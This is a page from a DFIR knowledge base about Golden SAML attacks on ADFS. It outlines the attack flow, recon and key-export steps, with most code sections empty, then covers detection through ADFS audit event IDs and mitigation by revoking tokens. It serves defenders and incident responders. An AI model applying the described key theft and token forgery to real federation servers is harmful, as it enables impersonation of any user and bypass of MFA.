📘
DFIR
  • Networking
    • Networking
      • SDWAN
      • VLANs
      • Virtual Networking
      • Segmentation
      • Applications
        • PAM/SSO
          • Privileged Password Management
          • Authentik
          • Beyond Trust
          • Cyberark
        • Network Tools
          • Palo Alto
          • Sonicwall
          • ZScaler
          • Firewalls
  • Windows
    • Administration
      • Honeypot
      • Deployment
      • Rogue Devices on Network
    • Forensics
      • System Info
      • Memory
        • Pagefile.sys
        • PowerShell Dump
        • Memory Forensics
      • Network Logs
        • UAL
        • Page 1
      • File System
        • Mounting File Systems
        • Log2Timeline
        • Volume Shadow Copies
        • $I30
        • UsnJournal/$LogFile
        • MFT
        • NTFS
        • Shellbags
        • Recycle Bin
      • Registry
        • Logged in Accounts
        • TypedPaths
        • WordWheelQuery
        • Page 5
      • Network Share
      • Exfiltration
        • RDP Clipboard
        • Exfil Exercise
        • DNS Over HTTPS
      • Evidence of Execution
        • Sum UAL
        • Office Apps Forensics
          • LastVisitedPidlMRU
          • File MRU
          • Trusted Documents
        • Run MRU
        • RecentDocs
        • FeatureUsage
        • BAM
          • DAM
        • Prefetch
        • Shimcache
        • RecentApps
        • AmCache
        • PCA
        • MUICache
        • UserAssist
        • SRUM
        • LNK Files
        • JumpLists
      • Hacktool Artifacts
        • DCSync
        • Impackets
          • GetUserSPN.py/Kerberoasting
          • Page
        • Psexec
        • Web Shells
        • BloodHound
      • Event Logs
        • Event Log IDs
          • SMB
            • 30803 Failed to Establish a Network Connection
            • 31010 SMB Client Failed to Connect
            • 551 SMB Auth Failed
            • SMB Forensics
          • 4740 Account Lockout
          • 4642 Logon
          • 5156 Show App IP Connections
        • Windows Defender
        • LOLBins
          • WebDav
          • Crashes (WER)
          • PowerShell
          • Scheduled Tasks
          • Services
          • WinRS
          • WinRM
          • RDP
            • 1024 RDP ClientActiveX is trying to connect
          • WMI
        • DNS Logs
        • Application NTDS.dit
        • Kerberos
        • Exchange
        • GPOs and OUs
        • Anti Forensics
      • 3rd Party Apps
        • IIS
        • Kubernetes
        • GitHub
        • Jenkins
        • Snowflake
        • Misc
          • Veeam
          • MongoDB
        • "TA Tools"
          • Ngrok
          • 7-Zip
          • PDQ Deploy
          • TotalCMD
          • WinSCP
        • Identity Apps
          • Okta
        • Microsoft
          • Microsoft Teams
          • VS Code
          • Excel
          • Notepad
        • SysInternals
          • PsExec.exe
        • RMM
          • ScreenConnect Forensics
          • AnyDesk
        • Zoom
        • Browser Forensics
          • Recovering Deleted History
          • Browser Artifacts
      • Example Page
    • Cheat Sheet
      • Red Team:
      • Windows Event Logs
      • Quick Wins
      • Docker
      • Admin
      • Zimmerman
    • Investigation
      • Malware Analysis
        • Macros Analysis
        • Packers
      • Persistence
        • Host Based Persistence Cheatsheet
        • M365 Persistence Cheatsheet
      • DFIR Tools
        • Volatility
        • Velociraptor
        • KAPE
        • Logman
      • Insider Threats
      • Scattered Identity
    • Internals
      • Structure
        • SMB
          • Admin
          • Attacks
        • Alternate Data Streams
        • Protocols
          • Wdigest
          • DPAPI
          • Kerberos
          • NetLogon
        • WinAPI
        • COM Objects
        • Files Types
        • DLLs
          • Attacks
            • Reflective DLL Injection
            • DLL Hijacking
        • Folders of Interest
      • Privileges
        • UAC
      • Applications
        • Werfault
        • Process Creation
        • Pipes
        • AMSI
        • LOLBins
          • xCyclopedia Index (EXEs)
          • WMI
          • Certutil.exe
          • Rundll32.exe
          • Schtasks.exe
          • Svchost.exe
          • DLLHOST.exe
          • MSIExec.exe
        • PowerShell
          • VBS
          • Forensics
          • Classes
          • Logging
          • PowerShell Modules
        • LSASS
          • Lsass Forensics
    • Active Directory
      • Internals
        • Sysvol
        • Attributes
      • Secure AD
        • Logs
        • Credentials
          • Restricted Admin Mode
          • LAPS
      • Attacks
        • Vulnerabilities
          • ViewState
          • ProxyShell
          • OWASSRF
        • Credential Theft
          • DCSync
        • ADCS
      • MSSQL
        • Admin
        • Attacks
    • MISC
      • Offensive Tool Analysis
      • Investigating Specific Activity
        • User Account Deleted
      • Dumping Domain Hashes with IFM Images
      • Lateral Movement
      • Advanced Obfuscation
      • SCCM
      • Malware Traffic
  • Linux
    • Forensics
      • Cron Jobs
      • File System Types and Timestamps
      • LD_PRELOAD
      • Linux Auditing Logs
      • example page
      • Process Accounting (pacct)
      • mlocate.db
    • SSH
    • Linux WebShells
    • Directories of Interest
    • Internals
      • Logs
      • File Descriptors
      • GTFOBins
  • Enterprise Architecture
    • CI/CD Pipline
      • Jenkins
    • Citrix
      • XenApp
      • Pentesting Guide
      • Forensics
    • Web Applications
      • JWT: JSON Web Tokens
      • Apache
        • CGI-Bins
      • ColdFusion
        • Attacking ColdFusion
    • The Cloud
      • AWS
        • Cases
        • Misconfigurations
        • Attacking AWS
          • SES
          • Privilege Escalation
        • Fundementals
          • Hierarchy
          • Roles
          • Security Services
          • IAM
            • Keys
          • CloudTrail
          • Services
            • S3
            • SES
      • Azure
        • Hunting
        • Admin
        • Securing Azure
          • CA Policies
        • CheatSheet
        • Detections
        • Forensics
        • Attacking Azure
          • Persistence
            • Cloud VMs
            • Applications
            • SSPR/MFA
          • Credential Theft
            • Golden SAML Theft
            • Attacking key vaults
            • Skeleton Keys (PTA Abuse)
            • Family of Client IDs
            • Token Theft
          • Initial Access
            • Subdomain Takeover
            • Authenticated Recon
            • Unauthenticated Recon
            • Password Spraying M365
            • Password Spraying OWA
            • OAuth 2.0 Abuse
            • Device code authentication abuse
            • M365 Business Email Compromise
          • Page 6
          • Test Page
        • Fundementals
          • Security/Service Principals
          • Tokens
          • Hierarchy
          • Roles
          • Architecture
          • Conditional Access
        • Logging
          • Audit Logs
      • M365
        • Forensics
          • Tokens
        • Business Email Compromise
        • Hardening
      • Cloud Labs
    • vSphere
      • Forensics
      • Hardening
      • Admin
    • Containers
      • Troubleshooting
      • Linxserver.io
      • Container Forensics
        • Docker Logs
      • Kubernetes
    • Troubleshooting
      • Cheatsheet
  • Mac
    • Forensics
      • Page 3
  • Attacker Information
    • Adversary Operations
      • c99 Webshell
      • Page 2
    • Actor Playbooks
      • TA Infrastructure
    • Abused Domains
  • IR Playbook
    • Activity from Unmanaged Host
    • Recommendations
  • Reverse Engineering
    • Python - Pyinstaller
Powered by GitBook
On this page
  • What Is Golden SAML Theft
  • ADFS Configuration (AADINTERNALS)
  • Why Golden SAML?
  • Attack
  • Recon for ADFS Object
  • Export DKM Commands:
  • Export ADFS Configuration:
  • Export Token Signing Certificate:
  • Forge SAML Token:
  • HTTP Request (Netwrix)
  • Mandiant ADFSDUMP
  • Detect
  • What logs are available?
  • Event Logs:
  • AD FS Audit Level Event IDs:
  • SACL to Detect DKM Export:
  • Normal SAML Creation:
  • Without Event Logs/EDR:
  • Mitigate
  • Revoke Refresh Tokens:
  1. Enterprise Architecture
  2. The Cloud
  3. Azure
  4. Attacking Azure
  5. Credential Theft

Golden SAML Theft

PreviousCredential TheftNextAttacking key vaults

Last updated 1 year ago

What Is Golden SAML Theft

ADFS Configuration (AADINTERNALS)

Attacker steals the ADFS certificate and private key to forge SAML tokens. Allows for persistence for password reset and impersonation of any user.

ADFS is a SSO tool that links a user's identity across on-prem, cloud, web apps, etc. ADFS preforms claims based authentication and provides a SAML token that contains a user's access rights whenever required.

Why Golden SAML?

  • Bypasses all MFA

  • Persistent through password resets

  • Impersonate any user in domain without their password

  • ADFS certificates are valid for one year (organizations often change this to 10 years).

  • Difficult to detect and certain auditing must be be enabled for any visual.

Attack

Attack flow:

  1. Compromise ADFS service account (default name: aadcsvc$) OR Domain Administrator.

  2. Export

    1. DKIM Key

    2. Token Signing Key

  3. Obtain Object GUID of user you want to impersonate

  4. Forge SAML Token

  5. Access specified resource (m365, web app, etc)

Find out what user is the ADFS service account by looking at "Log On As" in services or enumerate accounts to find it.

Recon for ADFS Object

Select the second one "CN=ADFS, CN=Microsoft, CN=Program Data, etc"

#AD Recon
Get-ADObject -Filter '-Name like "*"' -Server DC01 | findstr ADFS

Export DKM Commands:

Export ADFS Configuration:

Export Token Signing Certificate:

Forge SAML Token:

HTTP Request (Netwrix)

Mandiant ADFSDUMP

Detect

What logs are available?

  • Event Logs

  • EDR Logs

Event Logs:

  • Enable ADFS logging and set it to verbose

  • Enable logs for "Audit Service Ticket Operations"

  • Enable "Audit Applications Generated"

  • Enable AFDS trace logging

Enable ADFS Logging:

AD FS Audit Level Event IDs:

Audit Level

PowerShell syntax

Description

None

Set-AdfsProperties -AuditLevel None

Auditing is disabled and no events will be logged.

Basic (Default)

Set-AdfsProperties -AuditLevel Basic

No more than 5 events will be logged for a single request

Verbose

Set-AdfsProperties -AuditLevel Verbose

All events will be logged. This will log a significant amount of information per request.

The table below describes the events that are generated when the audit level is set to Basic:

Event Type

Event ID

Description

Fresh Credential Validation Success

1202

A request where fresh credentials are validated successfully by the Federation Service. This includes WS-Trust, WS-Federation, SAML-P (first leg to generate SSO) and OAuth Authorize Endpoints.

Fresh Credential Validation Error

1203

A request where fresh credential validation failed on the Federation Service. This includes WS-Trust, WS-Fed, SAML-P (first leg to generate SSO) and OAuth Authorize Endpoints.

Application Token Success

1200

A request where a security token is issued successfully by the Federation Service. For WS-Federation, SAML-P this is logged when the request is processed with the SSO artifact. (such as the SSO cookie).

Application Token Failure

1201

A request where security token issuance failed on the Federation Service. For WS-Federation, SAML-P this is logged when the request was processed with the SSO artifact. (such as the SSO cookie).

Password Change Request Success

1204

A transaction where the password change request was successfully processed by the Federation Service.

Password Change Request Error

1205

A transaction where the password change request failed to be processed by the Federation Service.

Sign Out Success

1206

Describes a successful sign-out request.

Sign Out Failure

1207

Describes a failed sign-out request.

The table below shows some of the additional events that are generated when the audit level is set to Verbose:

Event Type

Event ID

Description

Successful Token Issuance

299

A token was successfully issued for the relying party '%s’. See audit 500 with the same Instance ID for issued claims. See audit 501 with the same Instance ID for caller identity. See audit 502 with the same Instance ID for OnBehalfOf identity, if any. See audit 503 with the same Instance ID for ActAs identity, if any.

Federation Service Configuration

307

The Federation service configuration was changed.

AD FS HTTP Requests

403

An HTTP request was received. Information such as client IP, client request id, user agent and date.

AD FS HTTP Requests

404

An HTTP response was dispatched.

AD FS HTTP Requests

410

Following request context headers present.

Successful Token authentication

412

A token of type '%s' for relying party '%s' was successfully authenticated. See audit 501 with the same Instance ID for caller identity.

Successful Token Issuance

500

Additional context such as “Issued Claims” is provided by this event during the token issuance process.

Successful Token Authentication

501

Additional context such as “Caller Identity” is provided by this event during the token authentication event.

Additional Information

510

Additional information about events such as federation service configuration changes (307), HTTP requests received (403), HTTP requests dispatched (404), etc.

Type 3 and 4662:

DCSync with MSOL or ADFS account will be present if the DKIM is accessed. Does not prove that it was exported but will be present.

SACL to Detect DKM Export:

Normal SAML Creation:

ADFS will generate the following 3 events in security.evtx file if logging is enabled. Because Golden SAML is done offline, these will not be present for the user who forged the SAML ticket. These are not enabled by default.

  • Compare legitimate logins vs lack of ADFS login

Without Event Logs/EDR:

  • Execution Forensics

  • Command line logging

  • Credential Dumping/ Pass the hash of ADFS account

Mitigate

If this is ever suspected, burn it down with fire. If ADFS server was ever accessed, maintain abundance of caution and issue new certificate.

  • Treat ADFS as tier 0 device

  • Issue new ADFS certificate if Golden SAML is suspected

  • Ensure all auditing logging is enabled and audit logging is set to detect access to DKM

  • Revoke all refresh tokens

#Revoke all existing refresh tokens (forces user re-auth). 
Revoke-AzureADUserAllRefreshToken

Revoke Refresh Tokens:

Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
Detection And Hunting Of Golden SAML Attack
Export AD FS DKM Master Key via LDAP Queries — SimuLand
Export AD FS Configuration via a Local Named Pipe — SimuLand
Export AD FS Certificates via DKM Master Key — SimuLand
Forge SAML Tokens — SimuLand
Golden SAML AttackNetwrix
GitHub - mandiant/ADFSDumpGitHub
Enabling AD FS Security Auditing 📡 and Shipping Event Logs to Microsoft Sentinel 🛡️TECHCOMMUNITY.MICROSOFT.COM
Export AD FS DKM Master Key via LDAP Queries — SimuLand
Logo
Revoke-AzureADUserAllRefreshToken (AzureAD)MicrosoftLearn
Logo
Logo
Logo
Logo
Logo